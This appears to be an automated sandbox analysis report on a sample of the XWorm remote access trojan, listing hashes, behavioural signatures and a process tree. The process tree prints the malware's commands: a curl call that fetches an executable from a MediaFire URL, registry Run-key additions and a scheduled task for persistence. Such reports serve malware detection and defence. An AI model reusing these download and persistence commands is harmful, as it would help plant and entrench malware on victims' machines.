Analysis
-
max time kernel
146s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
22-03-2023 01:10
Static task
static1
Behavioral task
behavioral1
Sample
XWormContent.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
XWormContent.exe
Resource
win10v2004-20230221-en
General
-
Target
XWormContent.exe
-
Size
10KB
-
MD5
7d4e7449b76c34210100ea88c163c7fb
-
SHA1
ef679b47eb42f162355e8772ceb25712dc7ec75e
-
SHA256
4fc4ae98d231e2bf0b8d4ad5463d9d4f673c1d5d63dc98838cf14a61d64ce6e6
-
SHA512
d0ef46b3e5622160e9f6ce5cac8f2b14a10bad8e2c1f91a7e1d9713fd6ed844cf74817ca050e1a2d95ee9cd24ec01c67b6e279acddc95449553effbb8354ec1e
-
SSDEEP
192:qLH2ANdaLix1upSiP/VunlYJLLLTuzTVQLFjb5cqfM:qLH2ydaLiO3hPLTucTf
Malware Config
Signatures
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
XWormPanel.exeXWormContent.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation XWormPanel.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation XWormContent.exe -
Drops startup file 2 IoCs
Processes:
XWormPanel.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWormPanel.lnk XWormPanel.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWormPanel.lnk XWormPanel.exe -
Executes dropped EXE 3 IoCs
Processes:
XWormPanel.exeXWormPanel.exeXWormPanel.exepid process 3888 XWormPanel.exe 3984 XWormPanel.exe 1412 XWormPanel.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
reg.exereg.exeXWormPanel.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\XWormContent.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\XWormContent.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XWormPanel = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XWormPanel.exe" XWormPanel.exe -
Drops file in Windows directory 6 IoCs
Processes:
cmd.exedescription ioc process File created C:\Windows\MicrosoftTeams.exe cmd.exe File opened for modification C:\Windows\MicrosoftTeams.exe cmd.exe File opened for modification C:\Windows\win.ini cmd.exe File opened for modification C:\Windows\system.ini cmd.exe File created C:\Windows\XWormContent.exe cmd.exe File opened for modification C:\Windows\XWormContent.exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 32 timeout.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
XWormPanel.exepid process 3888 XWormPanel.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
XWormPanel.exeXWormPanel.exeXWormPanel.exedescription pid process Token: SeDebugPrivilege 3888 XWormPanel.exe Token: SeDebugPrivilege 3888 XWormPanel.exe Token: SeDebugPrivilege 3984 XWormPanel.exe Token: SeDebugPrivilege 1412 XWormPanel.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
XWormPanel.exepid process 3888 XWormPanel.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
XWormContent.execmd.exeXWormPanel.exedescription pid process target process PID 4380 wrote to memory of 2016 4380 XWormContent.exe cmd.exe PID 4380 wrote to memory of 2016 4380 XWormContent.exe cmd.exe PID 2016 wrote to memory of 4316 2016 cmd.exe curl.exe PID 2016 wrote to memory of 4316 2016 cmd.exe curl.exe PID 2016 wrote to memory of 32 2016 cmd.exe timeout.exe PID 2016 wrote to memory of 32 2016 cmd.exe timeout.exe PID 2016 wrote to memory of 3888 2016 cmd.exe XWormPanel.exe PID 2016 wrote to memory of 3888 2016 cmd.exe XWormPanel.exe PID 2016 wrote to memory of 4772 2016 cmd.exe reg.exe PID 2016 wrote to memory of 4772 2016 cmd.exe reg.exe PID 2016 wrote to memory of 776 2016 cmd.exe reg.exe PID 2016 wrote to memory of 776 2016 cmd.exe reg.exe PID 3888 wrote to memory of 3488 3888 XWormPanel.exe schtasks.exe PID 3888 wrote to memory of 3488 3888 XWormPanel.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\XWormContent.exe"C:\Users\Admin\AppData\Local\Temp\XWormContent.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\curl.execurl https://download1497.mediafire.com/av4hta6mkbagq9q63EQcCM1ZDZ0MJb3pOMqTati_JxDbj6616K7H9HKcefCbImq3V6MPY3E5pcdmBsEqSj4uScyyKg/ex02u2k9g7cros3/XClient.exe --output XWormPanel.exe3⤵PID:4316
-
-
C:\Windows\system32\timeout.exetimeout -t 33⤵
- Delays execution with timeout.exe
PID:32
-
-
C:\Users\Admin\AppData\Local\Temp\XWormPanel.exeXWormPanel.exe3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XWormPanel" /tr "C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe"4⤵
- Creates scheduled task(s)
PID:3488
-
-
-
C:\Windows\system32\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\XWormContent.exe /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:4772
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\XWormContent.exe /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:776
-
-
-
C:\Users\Admin\AppData\Local\Temp\XWormPanel.exeC:\Users\Admin\AppData\Local\Temp\XWormPanel.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
C:\Users\Admin\AppData\Local\Temp\XWormPanel.exeC:\Users\Admin\AppData\Local\Temp\XWormPanel.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1412
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
156KB
MD5ed44dc5ec5d2f4f29288cc873d7b6e5e
SHA163f471a8a2f5d21c6cc717ff4df5963fe0b426be
SHA2564060e66fbf7ff0ba0514d76d7e89e7e79f75b381d8145eb1fad15da55a2a9393
SHA5125aa192bfa71a94915e50ecdb40d59452b9c44bafd019b4d0632455a53034df6a28dd1bef663b0ad20889a60f65165d3ea317d1be3230c0d36d59377126a9d2a3
-
Filesize
156KB
MD5ed44dc5ec5d2f4f29288cc873d7b6e5e
SHA163f471a8a2f5d21c6cc717ff4df5963fe0b426be
SHA2564060e66fbf7ff0ba0514d76d7e89e7e79f75b381d8145eb1fad15da55a2a9393
SHA5125aa192bfa71a94915e50ecdb40d59452b9c44bafd019b4d0632455a53034df6a28dd1bef663b0ad20889a60f65165d3ea317d1be3230c0d36d59377126a9d2a3
-
Filesize
156KB
MD5ed44dc5ec5d2f4f29288cc873d7b6e5e
SHA163f471a8a2f5d21c6cc717ff4df5963fe0b426be
SHA2564060e66fbf7ff0ba0514d76d7e89e7e79f75b381d8145eb1fad15da55a2a9393
SHA5125aa192bfa71a94915e50ecdb40d59452b9c44bafd019b4d0632455a53034df6a28dd1bef663b0ad20889a60f65165d3ea317d1be3230c0d36d59377126a9d2a3
-
Filesize
156KB
MD5ed44dc5ec5d2f4f29288cc873d7b6e5e
SHA163f471a8a2f5d21c6cc717ff4df5963fe0b426be
SHA2564060e66fbf7ff0ba0514d76d7e89e7e79f75b381d8145eb1fad15da55a2a9393
SHA5125aa192bfa71a94915e50ecdb40d59452b9c44bafd019b4d0632455a53034df6a28dd1bef663b0ad20889a60f65165d3ea317d1be3230c0d36d59377126a9d2a3
-
Filesize
1KB
MD59ed2e107d38ab102bfe7614cfd24e829
SHA19541263008adf001fa4c3a0236f627223380d509
SHA256b7583f69e19e71f24a2820d9decb63402084072889114ccab8fc98b3d16bc598
SHA51231ab6308ba8840d2bc8667f45cec80090f595501df7851beba8584ed4556e505ddd3550cc83cdaeac38f6889904814ea155a7f779552e1c53a20885a0aefb6d2
-
Filesize
1KB
MD59ed2e107d38ab102bfe7614cfd24e829
SHA19541263008adf001fa4c3a0236f627223380d509
SHA256b7583f69e19e71f24a2820d9decb63402084072889114ccab8fc98b3d16bc598
SHA51231ab6308ba8840d2bc8667f45cec80090f595501df7851beba8584ed4556e505ddd3550cc83cdaeac38f6889904814ea155a7f779552e1c53a20885a0aefb6d2